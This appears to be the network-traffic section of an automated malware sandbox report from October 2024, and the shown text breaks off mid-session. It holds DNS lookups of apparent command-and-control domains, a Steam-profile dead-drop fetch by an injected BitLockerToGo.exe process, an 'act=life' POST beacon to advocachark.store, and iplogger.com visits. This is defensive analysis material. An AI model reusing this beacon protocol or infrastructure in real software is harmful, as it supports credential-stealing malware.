                                                                                                                                                                                                                                                Oct 3, 2024 16:10:35.297534943 CEST44349761142.250.186.164192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:35.297605991 CEST44349761142.250.186.164192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:35.297710896 CEST49761443192.168.2.6142.250.186.164
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:36.686574936 CEST49761443192.168.2.6142.250.186.164
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:36.686645031 CEST44349761142.250.186.164192.168.2.6
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.176155090 CEST5727553192.168.2.61.1.1.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.183535099 CEST53533911.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.184418917 CEST53572751.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.198301077 CEST6441053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.198613882 CEST5784353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.206382036 CEST53644101.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.208780050 CEST53578431.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.653476954 CEST5641353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.653631926 CEST6057453192.168.2.61.1.1.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.660455942 CEST53564131.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.660506010 CEST53605741.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.876797915 CEST6003453192.168.2.61.1.1.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.877017021 CEST5232153192.168.2.61.1.1.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.883966923 CEST53600341.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.885588884 CEST53523211.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.410794020 CEST5197653192.168.2.61.1.1.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.411288977 CEST5820853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.418250084 CEST53519761.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.418263912 CEST53582081.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:39.284915924 CEST53593101.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:58.303406000 CEST53612701.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:19.928312063 CEST53578151.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:21.167985916 CEST53580621.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:21.621778965 CEST4918853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:21.621849060 CEST5668653192.168.2.61.1.1.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:21.628532887 CEST53491881.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:21.629045963 CEST53566861.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:48.676996946 CEST53636671.1.1.1192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 3, 2024 16:09:17.280761957 CEST | 192.168.2.6 | 1.1.1.1 | 0xc9b0 | Standard query (0) | branchtriviawlek.shop | A (IP address) | IN (0x0001) | false
Oct 3, 2024 16:09:17.295245886 CEST | 192.168.2.6 | 1.1.1.1 | 0xad75 | Standard query (0) | racedsuitreow.shop | A (IP address) | IN (0x0001) | false
Oct 3, 2024 16:09:17.308396101 CEST | 192.168.2.6 | 1.1.1.1 | 0x92fe | Standard query (0) | defenddsouneuw.shop | A (IP address) | IN (0x0001) | false
Oct 3, 2024 16:09:17.319366932 CEST | 192.168.2.6 | 1.1.1.1 | 0x2f | Standard query (0) | deallyharvenw.shop | A (IP address) | IN (0x0001) | false
Oct 3, 2024 16:09:17.330985069 CEST | 192.168.2.6 | 1.1.1.1 | 0x5d60 | Standard query (0) | priooozekw.shop | A (IP address) | IN (0x0001) | false
Oct 3, 2024 16:09:17.341243029 CEST | 192.168.2.6 | 1.1.1.1 | 0x5b03 | Standard query (0) | pumpkinkwquo.shop | A (IP address) | IN (0x0001) | false
Oct 3, 2024 16:09:17.352942944 CEST | 192.168.2.6 | 1.1.1.1 | 0x6057 | Standard query (0) | abortinoiwiam.shop | A (IP address) | IN (0x0001) | false
Oct 3, 2024 16:09:17.363755941 CEST | 192.168.2.6 | 1.1.1.1 | 0x4f85 | Standard query (0) | surroundeocw.shop | A (IP address) | IN (0x0001) | false
Oct 3, 2024 16:09:17.375637054 CEST | 192.168.2.6 | 1.1.1.1 | 0x141f | Standard query (0) | covvercilverow.shop | A (IP address) | IN (0x0001) | false
Oct 3, 2024 16:09:17.386789083 CEST | 192.168.2.6 | 1.1.1.1 | 0xb2d3 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Oct 3, 2024 16:09:18.726466894 CEST | 192.168.2.6 | 1.1.1.1 | 0x8334 | Standard query (0) | advocachark.store | A (IP address) | IN (0x0001) | false
Oct 3, 2024 16:09:20.240343094 CEST | 192.168.2.6 | 1.1.1.1 | 0x306c | Standard query (0) | iplogger.com | A (IP address) | IN (0x0001) | false
Oct 3, 2024 16:09:20.240695953 CEST | 192.168.2.6 | 1.1.1.1 | 0xe1b0 | Standard query (0) | iplogger.com | 65 | IN (0x0001) | false
Oct 3, 2024 16:09:21.619370937 CEST | 192.168.2.6 | 1.1.1.1 | 0x5934 | Standard query (0) | a.nel.cloudflare.com | A (IP address) | IN (0x0001) | false
Oct 3, 2024 16:09:21.620413065 CEST | 192.168.2.6 | 1.1.1.1 | 0x9c3d | Standard query (0) | a.nel.cloudflare.com | 65 | IN (0x0001) | false
Oct 3, 2024 16:09:24.176002026 CEST | 192.168.2.6 | 1.1.1.1 | 0xcc1d | Standard query (0) | challenges.cloudflare.com | A (IP address) | IN (0x0001) | false
Oct 3, 2024 16:09:24.176155090 CEST | 192.168.2.6 | 1.1.1.1 | 0x91ab | Standard query (0) | challenges.cloudflare.com | 65 | IN (0x0001) | false
Oct 3, 2024 16:09:24.198301077 CEST | 192.168.2.6 | 1.1.1.1 | 0x24ab | Standard query (0) | iplogger.com | A (IP address) | IN (0x0001) | false
Oct 3, 2024 16:09:24.198613882 CEST | 192.168.2.6 | 1.1.1.1 | 0xf8df | Standard query (0) | iplogger.com | 65 | IN (0x0001) | false
Oct 3, 2024 16:09:24.653476954 CEST | 192.168.2.6 | 1.1.1.1 | 0xa053 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Oct 3, 2024 16:09:24.653631926 CEST | 192.168.2.6 | 1.1.1.1 | 0xfdf7 | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
Oct 3, 2024 16:09:24.876797915 CEST | 192.168.2.6 | 1.1.1.1 | 0xbd2c | Standard query (0) | challenges.cloudflare.com | A (IP address) | IN (0x0001) | false
Oct 3, 2024 16:09:24.877017021 CEST | 192.168.2.6 | 1.1.1.1 | 0x5229 | Standard query (0) | challenges.cloudflare.com | 65 | IN (0x0001) | false
Oct 3, 2024 16:09:25.410794020 CEST | 192.168.2.6 | 1.1.1.1 | 0xcc0d | Standard query (0) | challenges.cloudflare.com | A (IP address) | IN (0x0001) | false
Oct 3, 2024 16:09:25.411288977 CEST | 192.168.2.6 | 1.1.1.1 | 0xf1d4 | Standard query (0) | challenges.cloudflare.com | 65 | IN (0x0001) | false
Oct 3, 2024 16:10:21.621778965 CEST | 192.168.2.6 | 1.1.1.1 | 0xbe22 | Standard query (0) | a.nel.cloudflare.com | A (IP address) | IN (0x0001) | false
Oct 3, 2024 16:10:21.621849060 CEST | 192.168.2.6 | 1.1.1.1 | 0x5361 | Standard query (0) | a.nel.cloudflare.com | 65 | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 3, 2024 16:09:17.290560007 CEST | 1.1.1.1 | 192.168.2.6 | 0xc9b0 | Name error (3) | branchtriviawlek.shop | none | none | A (IP address) | IN (0x0001) | false
Oct 3, 2024 16:09:17.305035114 CEST | 1.1.1.1 | 192.168.2.6 | 0xad75 | Name error (3) | racedsuitreow.shop | none | none | A (IP address) | IN (0x0001) | false
Oct 3, 2024 16:09:17.317995071 CEST | 1.1.1.1 | 192.168.2.6 | 0x92fe | Name error (3) | defenddsouneuw.shop | none | none | A (IP address) | IN (0x0001) | false
Oct 3, 2024 16:09:17.329556942 CEST | 1.1.1.1 | 192.168.2.6 | 0x2f | Name error (3) | deallyharvenw.shop | none | none | A (IP address) | IN (0x0001) | false
Oct 3, 2024 16:09:17.340147018 CEST | 1.1.1.1 | 192.168.2.6 | 0x5d60 | Name error (3) | priooozekw.shop | none | none | A (IP address) | IN (0x0001) | false
Oct 3, 2024 16:09:17.350275993 CEST | 1.1.1.1 | 192.168.2.6 | 0x5b03 | Name error (3) | pumpkinkwquo.shop | none | none | A (IP address) | IN (0x0001) | false
Oct 3, 2024 16:09:17.362502098 CEST | 1.1.1.1 | 192.168.2.6 | 0x6057 | Name error (3) | abortinoiwiam.shop | none | none | A (IP address) | IN (0x0001) | false
Oct 3, 2024 16:09:17.373507977 CEST | 1.1.1.1 | 192.168.2.6 | 0x4f85 | Name error (3) | surroundeocw.shop | none | none | A (IP address) | IN (0x0001) | false
Oct 3, 2024 16:09:17.385386944 CEST | 1.1.1.1 | 192.168.2.6 | 0x141f | Name error (3) | covvercilverow.shop | none | none | A (IP address) | IN (0x0001) | false
Oct 3, 2024 16:09:17.396269083 CEST | 1.1.1.1 | 192.168.2.6 | 0xb2d3 | No error (0) | steamcommunity.com |  | 104.102.49.254 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 16:09:18.739311934 CEST | 1.1.1.1 | 192.168.2.6 | 0x8334 | No error (0) | advocachark.store |  | 104.21.42.210 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 16:09:18.739311934 CEST | 1.1.1.1 | 192.168.2.6 | 0x8334 | No error (0) | advocachark.store |  | 172.67.166.76 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 16:09:20.249994040 CEST | 1.1.1.1 | 192.168.2.6 | 0x306c | No error (0) | iplogger.com |  | 172.67.188.178 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 16:09:20.249994040 CEST | 1.1.1.1 | 192.168.2.6 | 0x306c | No error (0) | iplogger.com |  | 104.21.76.57 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 16:09:20.250003099 CEST | 1.1.1.1 | 192.168.2.6 | 0xe1b0 | No error (0) | iplogger.com |  |  | 65 | IN (0x0001) | false
Oct 3, 2024 16:09:21.626241922 CEST | 1.1.1.1 | 192.168.2.6 | 0x5934 | No error (0) | a.nel.cloudflare.com |  | 35.190.80.1 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 16:09:24.183535099 CEST | 1.1.1.1 | 192.168.2.6 | 0xcc1d | No error (0) | challenges.cloudflare.com |  | 104.18.94.41 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 16:09:24.183535099 CEST | 1.1.1.1 | 192.168.2.6 | 0xcc1d | No error (0) | challenges.cloudflare.com |  | 104.18.95.41 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 16:09:24.184418917 CEST | 1.1.1.1 | 192.168.2.6 | 0x91ab | No error (0) | challenges.cloudflare.com |  |  | 65 | IN (0x0001) | false
Oct 3, 2024 16:09:24.206382036 CEST | 1.1.1.1 | 192.168.2.6 | 0x24ab | No error (0) | iplogger.com |  | 104.21.76.57 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 16:09:24.206382036 CEST | 1.1.1.1 | 192.168.2.6 | 0x24ab | No error (0) | iplogger.com |  | 172.67.188.178 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 16:09:24.208780050 CEST | 1.1.1.1 | 192.168.2.6 | 0xf8df | No error (0) | iplogger.com |  |  | 65 | IN (0x0001) | false
Oct 3, 2024 16:09:24.660455942 CEST | 1.1.1.1 | 192.168.2.6 | 0xa053 | No error (0) | www.google.com |  | 142.250.186.164 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 16:09:24.660506010 CEST | 1.1.1.1 | 192.168.2.6 | 0xfdf7 | No error (0) | www.google.com |  |  | 65 | IN (0x0001) | false
Oct 3, 2024 16:09:24.883966923 CEST | 1.1.1.1 | 192.168.2.6 | 0xbd2c | No error (0) | challenges.cloudflare.com |  | 104.18.95.41 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 16:09:24.883966923 CEST | 1.1.1.1 | 192.168.2.6 | 0xbd2c | No error (0) | challenges.cloudflare.com |  | 104.18.94.41 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 16:09:24.885588884 CEST | 1.1.1.1 | 192.168.2.6 | 0x5229 | No error (0) | challenges.cloudflare.com |  |  | 65 | IN (0x0001) | false
Oct 3, 2024 16:09:25.418250084 CEST | 1.1.1.1 | 192.168.2.6 | 0xcc0d | No error (0) | challenges.cloudflare.com |  | 104.18.95.41 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 16:09:25.418250084 CEST | 1.1.1.1 | 192.168.2.6 | 0xcc0d | No error (0) | challenges.cloudflare.com |  | 104.18.94.41 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 16:09:25.418263912 CEST | 1.1.1.1 | 192.168.2.6 | 0xf1d4 | No error (0) | challenges.cloudflare.com |  |  | 65 | IN (0x0001) | false
Oct 3, 2024 16:10:21.628532887 CEST | 1.1.1.1 | 192.168.2.6 | 0xbe22 | No error (0) | a.nel.cloudflare.com |  | 35.190.80.1 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                                                • slscr.update.microsoft.com
                                                                                                                                                                                                                                                • steamcommunity.com
                                                                                                                                                                                                                                                • advocachark.store
                                                                                                                                                                                                                                                • iplogger.com
                                                                                                                                                                                                                                                • a.nel.cloudflare.com
                                                                                                                                                                                                                                                • https:
                                                                                                                                                                                                                                                  • challenges.cloudflare.com
                                                                                                                                                                                                                                                • fs.microsoft.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49699 | 4.175.87.197 | 443

Timestamp | Bytes transferred | Direction | Data
2024-10-03 14:09:16 UTC | 306 | OUT | GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=KGDWMUGzXSzGHLb&MD=tbZlVl+h HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
Host: slscr.update.microsoft.com
2024-10-03 14:09:16 UTC | 560 | IN | HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/octet-stream
Expires: -1
Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
MS-CorrelationId: b105af57-62b5-40bd-a45a-e311143abba4
MS-RequestId: 59bd6955-ca56-46b6-8201-718191387663
MS-CV: tCIgpMZEHUmyxVoZ.0
X-Microsoft-SLSClientCache: 2880
Content-Disposition: attachment; filename=environment.cab
X-Content-Type-Options: nosniff
Date: Thu, 03 Oct 2024 14:09:15 GMT
Connection: close
Content-Length: 24490


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49705 | 104.102.49.254 | 443 | 4368 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-03 14:09:18 UTC | 219 | OUT | GET /profiles/76561199724331900 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com
2024-10-03 14:09:18 UTC | 1870 | IN | HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Thu, 03 Oct 2024 14:09:18 GMT
Content-Length: 34837
Connection: close
Set-Cookie: sessionid=e9969dc44f782eb86bef39e0; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49707 | 104.21.42.210 | 443 | 4368 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-03 14:09:19 UTC | 264 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: advocachark.store
2024-10-03 14:09:19 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-10-03 14:09:19 UTC | 803 | IN | HTTP/1.1 200 OK
Date: Thu, 03 Oct 2024 14:09:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=fsc1jv93fic32380k8tuo7oc8p; expires=Mon, 27 Jan 2025 07:55:58 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PVg8icSSCnLGJPsZoT7P%2BQj%2F7AKYeWODZPkxPbVHGMFHjV%2BY%2BhzIYC86umMECB7NU0Q%2Fd9mWkztwzCbA3213DWrDayd9jycrBX5H4vkTckxC7de0JjHA2ArvOSim2U%2FXmypSKA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ccd825fa8d74235-EWR
2024-10-03 14:09:19 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
Data Ascii: aerror #D12
2024-10-03 14:09:19 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49714 | 172.67.188.178 | 443 | 6088 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 14:09:21 UTC | 661 | OUT | GET /1KhnJ4 HTTP/1.1
                                                                                                                                                                                                                                                Host: iplogger.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
2024-10-03 14:09:21 UTC | 1285 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 14:09:21 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                                Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                Cross-Origin-Resource-Policy: same-origin
                                                                                                                                                                                                                                                Origin-Agent-Cluster: ?1
                                                                                                                                                                                                                                                Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                X-Content-Options: nosniff
                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                cf-mitigated: challenge
2024-10-03 14:09:21 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49716 | 35.190.80.1 | 443 | 6088 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 14:09:22 UTC | 525 | OUT | OPTIONS /report/v4?s=pxV1pun6Odl5bdgZBWOVUjaqoZSnytH0ktSOuDwxstcebwZJv7QxCFrA975IpNydkNjpmdlUL%2BeEqF5Mvm8Ff7RkSMM9uw40RxJXZZeeBq6mD8njDcipAzlQbMKcRqU%3D HTTP/1.1
                                                                                                                                                                                                                                                Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Origin: https://iplogger.com
                                                                                                                                                                                                                                                Access-Control-Request-Method: POST
                                                                                                                                                                                                                                                Access-Control-Request-Headers: content-type
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
2024-10-03 14:09:22 UTC | 336 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                access-control-max-age: 86400
                                                                                                                                                                                                                                                access-control-allow-methods: OPTIONS, POST
                                                                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                                                                access-control-allow-headers: content-type, content-length
                                                                                                                                                                                                                                                date: Thu, 03 Oct 2024 14:09:21 GMT
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49717 | 172.67.188.178 | 443 | 6088 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 14:09:22 UTC | 933 | OUT | GET /1KhnJ4 HTTP/1.1
                                                                                                                                                                                                                                                Host: iplogger.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                                sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                sec-ch-ua-model: ""
                                                                                                                                                                                                                                                sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                                sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-10-03 14:09:22 UTC1285INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 14:09:22 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                                Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                Cross-Origin-Resource-Policy: same-origin
                                                                                                                                                                                                                                                Origin-Agent-Cluster: ?1
                                                                                                                                                                                                                                                Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                X-Content-Options: nosniff
                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                cf-mitigated: challenge


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49718 | 35.190.80.1 | 443 | 6088 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
